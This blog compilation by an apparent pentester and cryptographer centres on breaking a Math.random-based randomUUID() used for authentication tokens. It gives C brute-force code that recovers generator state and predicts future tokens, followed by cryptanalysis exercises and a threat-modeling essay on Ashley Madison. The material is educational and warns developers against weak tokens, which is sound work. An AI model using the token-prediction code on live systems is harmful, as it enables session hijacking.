  • Of all the features that Words With Friends has, the one that I think is most exploitable is the word-meter, because it can often tell you enough information about where the best word is that you can figure out that best word. As an example, I once thought I had a great word: ZAIRE for 68 points. But when I checked it with the word-meter, it went up only a few bars. I then estimated how big the best word must be based upon the percentage of bars showing up.   The estimate turned out to be close to 300 points. Next, I looked on the board for where would it be possible to get a word that big, and the only way it could possibly happen, I reasoned, was a word covering both a triple word score and a double word score, and the Z was on the triple letter score. Then noticing the ING combination (the N was already on the board, I had I and G), it was only a matter of a couple minutes before I found my highest word ever: TEAZLING for 275 points (and no, I never heard that word before).

[screenshot: TEAZLING played for 275 points]

Have fun.  My longest words are DISJUNCTION and OVERGRAZING (11 letters each), my biggest word is 275 points, and my highest scoring game is 800 (against a really weak opponent, but I have got in the 700s a few times against decent opponents).  What’s yours?

 

Cautionary note: UUIDs generally do not meet security requirements

Some time ago, I was doing a web application penetration test and noticed that the authentication tokens were UUIDs. I knew this was risky; in fact, if you read the UUID RFC, section 6 warns:

Do not assume that UUIDs are hard to guess; they should not be used as security capabilities (identifiers whose mere possession grants access), for example.

As a penetration tester, I was salivating over the thought that I could possibly find the ultimate attack on the application: being able to hijack sessions by predicting past and future UUIDs given a single UUID that I got for my authentication. But this of course is only possible if I knew how the UUIDs were being generated, and there is no fixed standard on their implementation. So what could I do? Ask the developers of course!

Discussion with one of the developers revealed that the UUIDs were generated on the server side in JavaScript using code called randomUUID(). JavaScript on the server side? I thought it must be Nodejs, but the developer said it was not. Instead, he insisted that they were using both Java and JavaScript on the server side, but the UUIDs are generated in JavaScript. Hmmm, I thought I should just take his word for it.

So I Googled for randomUUID JavaScript, and this turned up:

function randomUUID() {
  var s = [], itoh = '0123456789ABCDEF';

  // Make array of random hex digits. The UUID only has 32 digits in it, but we
  // allocate a few extra items to make room for the '-'s we'll be inserting.
  for (var i = 0; i < 36; i++) s[i] = Math.floor(Math.random()*0x10);

  // Conform to RFC-4122, section 4.4
  s[14] = 4;  // Set 4 high bits of time_high field to version
  s[19] = (s[19] & 0x3) | 0x8;  // Specify 2 high bits of clock sequence

  // Convert to hex chars
  for (var i = 0; i < 36; i++) s[i] = itoh[s[i]];

  // Insert '-'s
  s[8] = s[13] = s[18] = s[23] = '-';

  return s.join('');
}

Ahhh, good! It uses Math.random( ), which almost certainly is not cryptographically secure, so now it was just a matter of finding out how Math.random( ) is implemented in JavaScript. More Googling revealed this C equivalent of the function.  Further research revealed that the stack overflow post was not quite correct: a division by 2^32 was necessary at the end to convert the number to one between 0 and 1.  Thus the code looks like this:

double V8::Random() {
    // Random number generator using George Marsaglia's MWC algorithm.
    static uint32_t hi = 0;
    static uint32_t lo = 0;

    // Initialize seed using the system random(). If one of the seeds
    // should ever become zero again, or if random() returns zero, we
    // avoid getting stuck with zero bits in hi or lo by reinitializing
    // them on demand.
    if (hi == 0) hi = random();
    if (lo == 0) lo = random();

    // Mix the bits.
    hi = 36969 * (hi & 0xFFFF) + (hi >> 16);
    lo = 18273 * (lo & 0xFFFF) + (lo >> 16);
    return ((hi << 16) + (lo & 0xFFFF)) / 4294967296.0;   /* divide by 2^32 */
}

As a cryptographer, it didn’t take me very long to see that this pseudo random number generator (prng) has a problem, and thus I was at this point overly excited that I could easily break the UUID generator. I spent a couple hours implementing my attack, and sadly, it turned out not to work. Why?

I went back to the developer and asked him “are you sure you are using JavaScript to generate the UUIDs?” He double-checked, and found out that in fact they were calling Java’s UUID.randomUUID(). So I looked into that, and found:

The UUID is generated using a cryptographically strong pseudo random number generator.

At this point I gave up.

A recent blog

I regularly read reddit’s netsec subreddit, and a couple of days ago an extremely popular blog was posted there based upon the problems with the above prng: TIFU by using Math.random().

The author was mainly interested in the prng’s lack-of-collisions property rather than cryptographic purposes. He explained the problem with the prng in fine detail. I read through the blog thinking to myself “Gee, I noticed that a while back. Maybe I should have written my own blog about this!”

So today I decided to just add a little extra example of what’s wrong with that prng, this time focusing on its use for cryptographic purposes. I illustrate that it is absolutely trivial to break the JavaScript randomUUID() when it is used for something like authentication tokens. This also fits in well with my previous blog, which showed how to break a number of amateur cryptographic designs.

Breaking the randomUUID() function

If you have not read the blog post above on the fault with the prng, then here’s my own short description. We will work from the C code implementation of Math.random( ) above.

The state consists of (hi, lo), which are both 32-bit unsigned words. It would seem that one needs to try 2^64 combinations to recover the state; however, it turns out that in our case, we don’t need to. Look at the return value:

return ((hi << 16) + (lo & 0xFFFF)) / 4294967296.0;   /* divide by 2^32 */

Let’s break it down:

  • (hi << 16) shifts hi 16 bits to the left. The highest 16 bits get shifted off, and the least significant bits move into the most significant bit positions.
  • (lo & 0xFFFF) adds the least significant 16 bits of lo onto the above value.

So the net result is that the (lo & 0xFFFF) does not interfere with the (hi << 16). After the division by 2^32, we get a fractional number between 0 and 1.  If we think about the binary expansion of this fractional number, the first 16 bits after the decimal point come from hi, and the next 16 bits come from lo.

The other observation about the Math.random( ) function is that this is the only place where the two state words get mixed. So this tells us that if we only care about the most significant bits from the output, then the lo value does not get mixed in. And that means that we can brute force the part of the prng state that we care about by only concentrating on the hi value, which has 2^32 possibilities. That’s quick and easy to do on a desktop computer.

As you might have seen by now, the randomUUID() function above uses only a few of the most significant bits. Each nibble of the UUID string is calculated from:

s[i] = Math.floor(Math.random()*0x10);

The ‘0x10’ is the hexadecimal value of 16: in other words, we are shifting the random value left by 4 bits. This means that only the 4 most significant bits from hi get pushed past the decimal point, and then Math.floor( ) drops the remaining bits.
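You can convince yourself of this with a tiny Python emulation of the state update (my own transcription of the C code above): whatever lo is, the extracted nibble depends only on the freshly updated hi.

def mwc_nibble(hi, lo):
    hi = (36969 * (hi & 0xFFFF) + (hi >> 16)) & 0xFFFFFFFF
    lo = (18273 * (lo & 0xFFFF) + (lo >> 16)) & 0xFFFFFFFF
    value = (((hi << 16) & 0xFFFFFFFF) + (lo & 0xFFFF)) / 2**32
    return int(value * 0x10)                  # what randomUUID() stores in s[i]

hi = 0x12345678
for lo in (1, 0xDEADBEEF, 0xCAFEBABE):        # any lo yields the same nibble
    print(mwc_nibble(hi, lo))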

Implementing the attack

The attack is actually quite trivial. We get one UUID, and then we brute force (2^32 possibilities) the hi value that could have caused it. Note: if you are a cryptographer, you can likely find a more clever way than brute forcing hi, but with only 2^32 possibilities, why bother?

Once we have the hi value, we can compute future outputs of the prng that will produce the same UUIDs regardless of what lo is. That means that you can set lo to whatever you want: the attack will work with any value.

So in C, the search would look something like this:

#include <stdio.h>
#include <string.h>

void randomUUID( char *uuid );          // the C port of the JavaScript function above

static unsigned int hi = 0, lo = 0;     // global state consumed by randomUUID( )

int main( int argc, char** argv ) {
    char uuid[37], *target_uuid;
    unsigned int candidate_hi;
    int found = 0;

    if (argc < 2) {
        printf("usage: %s uuid\n\n", argv[0]);
        return -1;
    }

    target_uuid = argv[1]; // input validation omitted for brevity
    printf("Computing...\n");
    candidate_hi = 0; uuid[36] = '\0';
    // main loop: brute force all 2^32 possibilities for hi
    do {
        hi = candidate_hi;
        // generate randomUUID using candidate_hi as the seed,
        // store the result in the string uuid.
        randomUUID( uuid );
        if (!strncmp( uuid, target_uuid, 36 )) {
            found = 1;
            break;
        }
        ++candidate_hi;
    } while (candidate_hi != 0);        // stop when the counter wraps back to 0

    if (found) {
        int i;
        printf("\nThe value of hi was %u,", candidate_hi );
        printf(" and the next 10 UUIDs are:\n");
        for (i=0; i < 10; ++i) {
            randomUUID( uuid );         // (hi, lo) is live state, so these are the true next outputs
            printf("\t%s\n", uuid );
        }
    }
    else
        printf("No solution found.\n");
    return 0;
}

Here we have made (hi, lo) the global variables used by randomUUID( ). The main( ) takes in a UUID from the command line, which we call target_uuid. We loop through all possible values for hi and compute a UUID for each one. We then check whether it matches the target, and if so, we are done.

Complete Source Code

The complete source code for the search as described above is here.  It is a bit slow, but it is not hard to make it faster (see next section).  To test it, you will want to verify that you can break some UUIDs generated in JavaScript.  If you are using the Chrome browser, then see this simple JavaScript code here, which runs directly in your browser.  That code calls Math.random() to generate the randomness, just as described above.  However, the attack code will not work if the UUID is generated in other browsers, because different browsers implement Math.random() in different ways.  For that reason, I also have another JavaScript implementation that works in all browsers by emulating Chrome’s Math.random(). You can download that here.

Making it faster

There are two ways to make it faster: algorithmically, or by improving the implementation. Here we focus only on the latter.

The code currently computes a whole UUID for each candidate_hi, which means calling Math.random( ) 36 times. However, if we have a wrong candidate, there is a good chance that the newly computed UUID will be wrong in the first few nibbles. Why not check the UUID against the target while it is being computed, and abort early if it does not match? This gives a huge speedup. On my work Macbook Pro, I can perform the brute force within 1 minute.

Concluding remarks

Are you a developer relying on UUIDs for security? If so, you had better double-check the implementation under the hood. If you are not sure what is there, then I highly recommend you move away from UUIDs and use something that was designed for cryptographic purposes. UUIDs were not designed for this purpose! If your UUID generator happens to be backed by a cryptographically secure prng, then you should feel fortunate.

If you’re a pentester and you find a system that relies on UUIDs for security, then I’d appreciate it if you can find out what is implemented under the hood. Oftentimes these things can be broken trivially, as demonstrated above.

 

So, You Want to Learn to Break Ciphers

Every now and then, I read a question about learning how to break ciphers, or more generally how to become a cryptographer/cryptologist.  From my viewpoint, the most important part of learning this skill is not advanced mathematics, but instead first learning how to think like a cryptographer.  When you go to break a cipher, there are no instructions on how to do it.  You simply need to get your hands dirty with the function under consideration and look for things that do not seem desirable for a secure function of that type.  While having a bag of tricks is going to help, ultimately it’s your creativity, persistence, and skills that are more likely going to make the difference.

I believe that there are a number of hackers out there who already know how to think the right way, and it is simply a matter of exercising that thought process on some reasonable, non-contrived examples to begin to understand what it takes to be a cryptologist.  You should not need to know advanced mathematics or advanced cryptographic techniques (such as linear or differential cryptanalysis) to get started.  So welcome to my blog post, which provides a number of exercises for you to practice on.  These examples mostly come from cryptanalysis that I have done, largely because I know the results, I was able to dig them up, and attacking them did not use advanced techniques.  I am building a list of other examples at the bottom of this blog, and invite other readers to add to it.

Before we begin, I want to point out some other resources on this topic:

  • Schneier’s Self-Study Course in Block Cipher Cryptanalysis is a great resource, but in my mind it is not the ideal place to start — from my viewpoint, it is the next step after you prove you can break ciphers such as what I have below.  By the way, you absolutely should read Schneier’s article So, You Want to be a Cryptographer.
  • The Matasano Crypto Challenges.  While they are similar in spirit to what I am writing here, my focus is at a lower level — breaking specific cryptographic primitives rather than constructs built from these primitives.  Regardless, the Matasano challenges are another great place to start.
  • The Simon Singh Cipher Challenges from his book, The Code Book.  This book is really fun to read, and will get you into the spirit of breaking his challenges.  But the first challenges are too easy and the last ones are very hard: it is really the middle ones that are most interesting.

I’m adding to the existing resources because I have a nice, small collection of my own that I have accumulated over the years.  Like the Matasano challenges, my focus is on providing modern examples that are easy to break without complex mathematics or advanced cryptographic techniques.  These examples illustrate how to think like a cryptographer without requiring all the complex background in the most advanced cryptanalytic techniques.  If you can solve these problems (and your solutions may not necessarily be the same as mine), then you have the right type of thinking to become a cryptographer.  This blog post is written for computer scientists without deep mathematics skills who want to learn how to do cryptanalysis, and for teachers of cryptography for computer science students.

The examples come from different sources.  For example, I have a few proposals by amateurs that were easily cracked, including a couple from the old sci.crypt Google group (it was a popular meeting place for crypto-geeks before Google took over).  I have at least one proposal by an expert in some other field that was attempting to apply his skills to cryptography despite having little background in crypto.  I have one design that was built into software and relied upon for real-world security.  And then I have one example of something that was not intended for cryptographic purposes yet sometimes is misused by developers who do not understand that.  So let’s get started!

PHP’s lcg_value( )

PHP’s lcg_value( ) is a pseudo random number generator (PRNG) that is not intended to provide cryptographic security.  Nevertheless, it occasionally gets used in ways that it should not be used.

The internal state of the PRNG has 2^62 possible combinations, which is too many to brute force in this day and age.  However, one technique that is often employed in cryptanalysis is trying all possibilities for half of the bits (2^31 combinations here) and, for each candidate, seeing if you can compute the remaining bits in constant time.  You then check whether the candidate is right by computing future outputs from the assumed internal state to see whether or not they match.  If they do, then you presume you have the right state, and if they do not match, then you know the candidate is wrong.

It turns out that this technique does work for lcg_value( ), and thus it can be cracked in 2^31 operations.  The details are here (the page describes the algorithm, how to attack it, and then provides a link to my solution).  This could take anywhere from a half-day to two days, depending upon your experience.  As a bonus, there is an advanced topic at the end of the link — how to crack lcg_value( ) if you only get a fraction of the output bits per iteration: this is a bit harder.
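To give a flavour of the half-state technique without spoiling the linked solution, here is a rough Python sketch. Caveats: the constants are from my memory of PHP's combined LCG (verify them against the PHP source), and recovering the integer z from the floating-point output by rounding may be off by one, so treat this strictly as a sketch of the idea.

M1, M2 = 2147483563, 2147483399               # moduli of the two LCGs (check the PHP source)
A1, A2 = 40014, 40692

def z_from_output(output):
    # lcg_value() returns z * 4.656613e-10; recover the integer z by rounding.
    return round(output / 4.656613e-10)

def recover_state(out1, out2):
    z1, z2 = z_from_output(out1), z_from_output(out2)
    for s1 in range(1, M1):                   # guess half the state: ~2^31 candidates
        s2 = s1 - z1                          # the other half follows from the first output
        if s2 < 1:
            s2 += 2147483562                  # z was reduced into [1, 2147483562]
        s1n, s2n = (s1 * A1) % M1, (s2 * A2) % M2
        z = s1n - s2n
        if z < 1:
            z += 2147483562
        if z == z2:                           # candidate survives: verify with more outputs
            return s1n, s2n
    return None

Looping over 2^31 candidates in pure Python is painful, and in practice you would write the loop in C. The structure is what matters: guess half the state, solve for the other half from one output, and verify against the next.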

Chaotic hash function

Every year there is the Crypto conference in Santa Barbara that has a light-hearted “rump session” where participants can present research-in-progress or anything of interest to the cryptographic community.  In the Crypto 2005 rump session, a researcher presented his new hash function based upon chaos theory.  The researcher was unknown to the cryptographic community.  He put up lots of graphs of his hash function, which might have been intimidating to one with no cryptographic experience, but that was not most of the audience, and hence hardly anybody listened to his presentation.  But I listened carefully, because I suspected an easy target that I wanted to have a go at.

Why did I suspect it was an easy target?  I knew absolutely zero about chaos theory, and had no intention of learning it.  But what I saw was a guy who did not know anything about cryptography and how ciphers were attacked, and I was pretty sure I could find collisions in his hash function regardless of any graphs or mathematics behind his design.  The only trick was getting an exact specification so that I could demonstrate that I could break it.  This obstacle is often encountered in cryptanalysis — non-experts do not nail down their specification for whatever reason, but the cryptanalyst needs something concrete to demonstrate his attack.  So I exchanged email with him a few times and we finally agreed that the following C code represents his hash function (where ROTL and ROTR are circular left and right bit rotations):

void hash( unsigned int *input, int len, unsigned int output[4] )
{
    unsigned int x, y, z, u, X, Y, Z, U, A, B, C, D, RV1, RV2, RV3, RV4;
    unsigned int M = 0xffff;
    int i, offset;
    x = 0x0124fdce; y = 0x89ab57ea; z = 0xba89370a; u = 0xfedc45ef;
    A = 0x401ab257; B = 0xb7cd34e1; C = 0x76b3a27c; D = 0xf13c3adf;
    RV1 = 0xe12f23cd; RV2 = 0xc5ab6789; RV3 = 0xf1234567; RV4 = 0x9a8bc7ef;

    for (i=0; i < len; ++i) {
        offset = 4*i;
        X = input[offset + 0] ^ x; Y = input[offset + 1] ^ y;
        Z = input[offset + 2] ^ z; U = input[offset + 3] ^ u;

        /* compute chaos */
        x = (X & 0xffff)*(M-(Y>>16)) ^ ROTL(Z,1) ^ ROTR(U,1) ^ A;
        y = (Y & 0xffff)*(M-(Z>>16)) ^ ROTL(U,2) ^ ROTR(X,2) ^ B;
        z = (Z & 0xffff)*(M-(U>>16)) ^ ROTL(X,3) ^ ROTR(Y,3) ^ C;
        u = (U & 0xffff)*(M-(X>>16)) ^ ROTL(Y,4) ^ ROTR(Z,4) ^ D;
        RV1 ^= x; RV2 ^= y; RV3 ^= z; RV4 ^= u;
    }
    /* now run 4 more times */
    for (i=0; i < 4; ++i) {
        X = x; Y = y; Z = z; U = u;

        /* compute chaos */
        x = (X & 0xffff)*(M-(Y>>16)) ^ ROTL(Z,1) ^ ROTR(U,1) ^ A;
        y = (Y & 0xffff)*(M-(Z>>16)) ^ ROTL(U,2) ^ ROTR(X,2) ^ B;
        z = (Z & 0xffff)*(M-(U>>16)) ^ ROTL(X,3) ^ ROTR(Y,3) ^ C;
        u = (U & 0xffff)*(M-(X>>16)) ^ ROTL(Y,4) ^ ROTR(Z,4) ^ D;
        RV1 ^= x; RV2 ^= y; RV3 ^= z; RV4 ^= u;
    }
    output[0] = RV1; output[1] = RV2; output[2] = RV3; output[3] = RV4;
}

Does it look intimidating?  Well, once you start to get your hands dirty, you will see that it is not that bad at all.  The loop at the bottom does not involve any inputs, so if we can create a collision in the top loop, then it will give a collision in the hash.  The top loop takes blocks of 4 input words (128 bits) per iteration and mixes them into the existing state.  Here’s the real killer: for any iteration, the attacker can make (X, Y, Z, U) whatever he wants, because he can compute (x, y, z, u) at the beginning of that iteration (simply by processing the previous inputs) and choose the next inputs accordingly.  Now there is still some ugly multiply and rotation stuff in there, but given that you can control (X, Y, Z, U), you can then make those multiplies and rotations behave in a convenient way for your attack.  Suddenly, what seemed to be a ferocious looking lion is nothing more than a tiny kitty cat.  Have a go yourself before you look at my attacks.  This one was easy and really fun to break.

By the way, after breaking this one, you should have decent insight into why algorithms of the MD and SHA families have a pre-processing phase that involves the message length, and use a message expansion that makes sure that functions of the input words get mixed in multiple times per iteration.

Hash Function with “Technique in Overlapping Sums”

Here is another easy one from an amateur on the good old sci.crypt group.  The author forgot to both declare and initialise the hash variable, so I have fixed up the code below:

#define UL unsigned long
#define LEFT 13
#define RIGHT 19

UL hash[5];
void round() {
    hash[4] += hash[0] >> RIGHT; hash[0] += hash[0] << LEFT;
    hash[0] += hash[1] >> RIGHT; hash[1] += hash[1] << LEFT;
    hash[1] += hash[2] >> RIGHT; hash[2] += hash[2] << LEFT;
    hash[2] += hash[3] >> RIGHT; hash[3] += hash[3] << LEFT;
    hash[3] += hash[4] >> RIGHT; hash[4] += hash[4] << LEFT;
}

void processBlock(const UL in[25])
{
    int i, j, r, s;

    memset( hash, 0, sizeof(hash) );
    for (i = 0; i < 5; i++) {
       s = 0;
       for (r=0; r<5; r++) {
           for (j = 0; j < 5; j++) {
               hash[j] ^= in[j+s];
               hash[j]++;
           }
           round();
           s += 5;
       }
    }
}

It seems to be only a compression function (processBlock( )) that takes a 25-word input and produces a 5-word output.  For the r’th round, he mixes inputs in[5*r], … , in[5*r+4] into hash[0], …, hash[4], seemingly unaware that we can compute the state of hash at any point and choose our next inputs accordingly (similar to the way we broke the chaotic hash).  This one falls trivially, but for fun, I made my collisions preimages of the all-zero output.

FastFlex

When FastFlex was proposed in 2006, the author made bold claims on the sci.crypt newsgroup about it being resistant to linear and differential cryptanalysis, and wondered whether there might be any other issues he needed to worry about.  When somebody talks about these cryptanalysis techniques, you assume they know a little bit about cryptography, but it just goes to show: learning the techniques without knowing how to think like a cryptographer is of little value.  I took a look at the author’s code, and it had basic problems such as uninitialised variables.  Within about half an hour, I found collisions in the hash function (it may seem like I am always sending in zero words for the functions I break, but I didn’t need to for this one) using techniques similar to how I broke the chaotic hash function above, and such collisions could easily be produced regardless of how the variables were initialised.  The amusing reply from the author acknowledged the problem but somehow concluded that FastFlex was still safe!

After my reply, the author modified his design and submitted it for publication, carefully making sure that the sci.crypt people did not see the updated design during the time frame of the publication attempt.  The author claims that the paper was published (see the bottom of the page), but the updated paper makes no acknowledgement of the insecurity of the previous version or of my finding.  The evidence for security given in the updated paper is pretty weak.

Unfortunately, the original specification seems to be no longer around, so breaking the new version remains open.  But let’s just say that how I broke it had a lot of similarities to how I broke the chaotic hash function, so first prepare yourself accordingly, and then take out the new FastFlex!  FastFlex is designed to build a number of cryptographic constructs from it.  I recommend starting with the hash functions, and after you break those, go after the random number generator.  If you are like me, you’ll start by going directly after the implementation rather than trying to waste too much time trying to read the author’s research paper.

If FastFlex was indeed published, then you should be able to get a publication out of breaking it provided that you write it up well.  I’d be most delighted to hear successful attacks on this one.  Note to attackers: make sure you save a copy of his code and pdf description after you break it so that the author cannot hide the history.

R.A.T.

Amateurs are never shy to come up with their own cryptographic solutions, and often are generous enough to give them to the world unencumbered by patents.  While their hearts are in the right place, it is just not that easy to build a secure cryptosystem.  At the bottom of this linked page, you can read about the R.A.T. encoding and decoding system.

I’m pretty sure there are numerous ways to attack this one (especially if you want to use linear algebra, but I didn’t); my solution is at this link. Don’t look at it until you have found your own solution!

But here are two hints to start you out:

  1. Always give yourself the advantage by starting out with a chosen plaintext attack (or chosen ciphertext attack), and then it can likely be converted into other types of attacks later.
  2. It makes things easier if you write it out in terms of arrays (for A and B) so you can keep track of the relation between things from iteration to iteration.

To elaborate on point 2, the cipher would look something like this (where  A, B, and X are byte arrays of the length of the input size, and key is a byte array of length 256 — how it was generated does not really matter in my attack):

    initialise:  A[0] = 0, B[0] = 128

    for i = 1 to the number of plaintext bytes {
        Let X[i] = i'th plaintext byte
        A1 = X[i] ^ key[ B[i-1] ]
        B[i] = A1 ^ key[ A[i-1] ]
        output B[i] as the i'th byte of the ciphertext
        A[i] = A1
    }
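If you would rather attack running code than pseudocode, here is my direct Python transcription of the above (assuming a 256-byte key; again, how the key is generated does not matter for the attack):

def rat_encrypt(plaintext, key):
    A, B = 0, 128                             # initialisation from the pseudocode
    ciphertext = bytearray()
    for x in plaintext:                       # x is the i'th plaintext byte
        A1 = x ^ key[B]
        B = A1 ^ key[A]                       # B is the i'th ciphertext byte
        ciphertext.append(B)
        A = A1
    return bytes(ciphertext)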

My break revealed bytes of the key when a certain condition happens, but I bet you can generalise it to do better.

“Multiswap”

In 2001, “Beale Screamer” reverse engineered and broke Microsoft’s Digital Rights Management scheme — see link.  The scheme involved a cipher that he named “multiswap” (described in the link), because it used multiplication and swapped halves of computer words around.  Beale Screamer’s break of the DRM scheme did not touch the cryptography, which made it a prime target for cryptographers.

I immediately had a look at the cipher, and it didn’t take me long to find a way to recover two words of the key (k[5] and k[11]) simply by choosing my plaintexts in such a way that made the multiplies disappear (hint hint).  I went to sleep thinking I would return to it the next day to attack more of the cipher.  Unfortunately, my plans were preempted by a fast team of Berkeley cryptographers who had broken the entire cipher by the next day — their solution is here.

Unsurprisingly, I started my attack the exact same way as the Berkeley team to recover two words of the key.  You should be able to do the same thing.  After that, they used differential cryptanalysis to get the rest.  Since I assume that the reader is new to cryptography, I am not going to expect that he/she derives the remaining parts of the key the way the Berkeley team did.  However, there are various approaches one can play with in order to refine one’s cryptographic skills.  For example, knowing the plaintext allows you to compute s0′ and s1′ (from the Berkeley description, which I believe is easier to work from). Then, one can try to deduce k[0], …, k[4] independently of k[6], … , k[10].  We could almost attempt the same technique that we used to break lcg_value( ) here, except that is still too many key bits to guess in a practical implementation.  However, if you reduce the size of the cipher in half (half the number of key words, half the number of rounds), then such a technique should work.  Give it a try!

Finally, one of the cutest parts of the Berkeley attack was showing how to convert the chosen plaintext attack into a known plaintext attack.  As we said before, give yourself the best advantage to start out with, and then worry about converting it to other forms of attacks later!

Other targets to play around with

Over many years on sci.crypt, I saw a number of ciphers broken by members of the group.  I also occasionally see new ones that I think must be trivially breakable.  Nowadays, reddit seems to be the place to go.  It is impossible for me to dig up all of the easily broken designs, but here are a few that I remember:

  • The hash function Shahaha was proposed here, and broken by Scott Fluhrer here.  Can you come up with your own break?  (Scott Fluhrer broke a number of amateur designs in the sci.crypt days, but this is the only one I have found so far.)
  • Just as I was trying to dig up old sci.crypt examples of ciphers, somebody on reddit’s crypto group posted an “I designed my own crypto” thread.  This is a block cipher called XCRUSH; the full design is here.  The author claims that it is purely an academic exercise and makes no security claims at all in the paper, so his motivation is entirely learning.  It is also written up nicely, which is an advantage if you want people to look at your design.  Soon after it was posted on reddit, a character going by the identity of bitwiseshiftleft found theoretical weaknesses (as in many of the examples above, the magic zero comes into play here again).  See the comments in the reddit thread for more detail.  There was also some interesting analysis based upon SAT solvers, but that is outside my expertise, so I leave the reference for interested parties.
  • This one might require a little bit of math; who knows how much (I can’t be sure, as I have not tried attacking it yet).  Here is a public key cryptosystem that seems too good to be true.  However, the author made a pretty basic mistake in his analysis (first observed by rosulek): the author claims to have proven that you can break it by solving circuit satisfiability (SAT).  Ummm, you can break every cryptosystem if you can solve SAT efficiently!  What would have been more interesting was showing the converse: if you could break his cryptosystem, then you could solve SAT.  The simple fact that the author did not know which direction to do the security reduction in is indicative of his lack of experience, and hints that the system can easily be broken.
  • I was debating whether or not to include the first attacks on the original SecurID in the main list above, but ultimately I decided that it is too much detail.  However, if anybody wants to have a go: here is the reverse-engineered code from “I.C. Wiener”, here is the description of the function from Belgian cryptographers (my coauthor and I worked from the original version that they posted on eprint, which has since been updated), and here is the first attack I found.  Read through section 1 of my attack, and then try to attack it with the following information in mind: the vanishing differentials (collisions) happen in the first 32 subrounds, so key search can be expedited by computing only part of the function rather than the full thing (so what fraction of the function do you need to compute in order to test for a collision?).  But there is even more you can do here: only the first 32 bits of the key are involved in the first 32 subrounds, and many of these permutations on the data overlap, leading to more speedups.  Two important notes: (1) although the term “vanishing differential” suggests differential cryptanalysis (not suitable for a beginner), the term really just means hash collision here, and (2) RSA has since discontinued that function and is now using something more standard in their design.

If you know of any other good ones (including a sample break), then please provide the link and I will try to regularly update the list.

A Retrospective on Ashley Madison and the Value of Threat Modeling

One of my favourite authors in the field of computer security is Gary McGraw.  If you are not familiar with him, I’d suggest you start by reading his book Software Security: Building Security In.  One of the key points he makes is the distinction between security bugs and security flaws: the former are simple problems that involve only a small piece of code, such as cross site scripting, SQL injection, and lack of input sanitisation; the latter are more complex problems at the design level, and thus cannot be pinpointed to a small section of code.  Gary points out that half of the problems he sees in practice are bugs and the other half are flaws.  These odds are not good when you take into consideration that flaws are much harder to fix than bugs, because they are ingrained in the software’s design.

So here I want to talk about how this applies to the recent Ashley Madison hack.  But I should be clear that calling the Ashley Madison problem a “design flaw” may be a stretch given the current state of the art in web security software.  What I hope is that some time in the future, major systems will be designed with much more thought given to their security and the protection of private information.  Our story starts with what Ashley Madison did right: using bcrypt to protect passwords.

Ashley Madison used Bcrypt to Protect Passwords

As noted in a number of online articles, Ashley Madison protected passwords in the database the right way: they used bcrypt.  (EDIT: On 10 September, a researcher found that the website had a security bug allowing attackers to bypass the bcrypt computation — regardless, continue reading, because the real value of this article is when we discuss ephemeral knowledge web applications below.)  Ask a leading security practitioner about protecting passwords in databases and they will recommend bcrypt, scrypt, or PBKDF2 (or Argon2 if they have been following the password hashing competition).  So Ashley Madison did not have a software bug in its password protection.

But let’s step back a moment and ask why tools such as bcrypt are recommended, for which we cite the web’s subject-matter expert, Thomas Pornin:

Let’s see the following scenario: you have a Web site, with users who can “sign in” by showing their name and password. Once signed in, users gain “extra powers” such as reading and writing data. The server must then store “something” which can be used to verify user passwords. The most basic “something” consists in the password themselves. Presumably, the passwords would be stored in a SQL database, probably along with whatever data is used by the application.

The bad thing about such “cleartext” storage of passwords is that it induces a vulnerability in the case of an attack model where the attacker could get a read-only access to the server data. If that data includes the user passwords, then the villain could use these passwords to sign in as any user and get the corresponding powers, including any write access that valid users may have. This is an edge case (attacker can read the database but not write to it). However, this is a realistic edge case. Unwanted read access to parts of a Web server database is a common consequence of an SQL injection vulnerability. This really happens.

There are other ways than SQL injection that a database can leak, including insecure backups, an attacker getting a reverse shell on the system (which can happen in a variety of ways), physical break-in, insider threat, and poor network configuration.  We don’t know for sure what happened in the case of Ashley Madison, but there is some indication here.

If you have been following security for a while, you will know that database exposures happen all the time.  The good news is that with the exception of not having a password complexity policy, Ashley Madison’s website did protect passwords the right way!

So What’s the Problem Here?

Glad you asked.  You see, the passwords were protected via bcrypt as a “second line of defence”, i.e. to prevent hackers from getting user passwords in the event of a database leak.  But in retrospect, we now know that the hackers that got the data did not give a darn about the users’ passwords: instead, they wanted the users’ private information, such as names, addresses, and email addresses.  So why didn’t that private information get the same second line of defence that the user passwords got?

Let’s be honest: almost certainly the answer is that the web designers never thought about it, or perhaps never cared about the question, and instead just put in their best effort to build the website within the budget they had, following the general security best practices that they were aware of.

But the honest question is less interesting to me than the research question: how would you design a website that has a second line of defence for protecting members’ private information?  In other words, if the hacker can get the database, can the information in the database still be protected?  The applicability of this question is not limited to adult websites, for example it may be of value to websites holding patient medical information.

If you followed me this far, maybe you realise that we are thinking about this from a threat modeling perspective (identifying assets that the system holds and mechanisms for protecting those assets), and we are trying to architect a system that better protects data in the event of a security breach.

Pause and Understand What We are Trying to Solve

If you come from an operational security background, you may be thinking that the problem with the Ashley Madison breach is the lack of operational security defences.  You may be thinking about monitoring, alerting, network configuration, patching, intrusion detection, and so on.

Those defences are all fine, but that’s not what we’re trying to do here.  Instead, we’re trying to solve it from an application security perspective: building applications that resist attacks in the event of other things failing.  Think of it as defence in depth: if everything else fails, we still want the data to be protected, just like the passwords are protected.

It’s Not as Simple as Encrypt the Data

I always get amused when people think the solution to everything is encryption.  Encryption is easy; key management is hard.  If you are going to encrypt the database, then where do you put the key?  Given that the website needs to be able to decrypt content as it is needed, a hacker who gets a shell on the system would also be able to decrypt data as it is needed, so we haven’t really solved anything yet.

Towards a Solution: Basic Concepts

A former colleague of mine, Blair Strang, had a lot of great ideas about protecting private information.  What I write here is largely influenced by his ideas (though I take the blame for any errors in presentation).

This is the most important paragraph of the whole blog: read it three times.  We start with the concept of a zero-knowledge web application, which is a web application built so that not even the server can decrypt the data, and we relax it slightly: we instead require that the server can only decrypt a user’s sensitive data while that user has an active session.  This means that if the system is hacked at any point in time, then only users with active sessions at that time will have their data compromised; other users will be safe by design.  In the event of a breach, most of the data will be protected.

Why do we make this relaxation?  Because a zero-knowledge design is overkill, and hard to realise in practice.  Zero-knowledge web applications are designed with the goal of making it so that you do not even need to trust the service provider, which has the side effect of limiting the features that the server can provide.  We want instead a design where we trust the service provider, yet data still remains largely protected in the event of an intrusion.  This means that the server internally makes its best effort to enforce the least privilege concept on sensitive data through a clever use of key management and cryptography (disposing of the cryptographic key and unencrypted data at the end of the user’s session as our second line of defence).  We will call this concept an ephemeral knowledge web application.

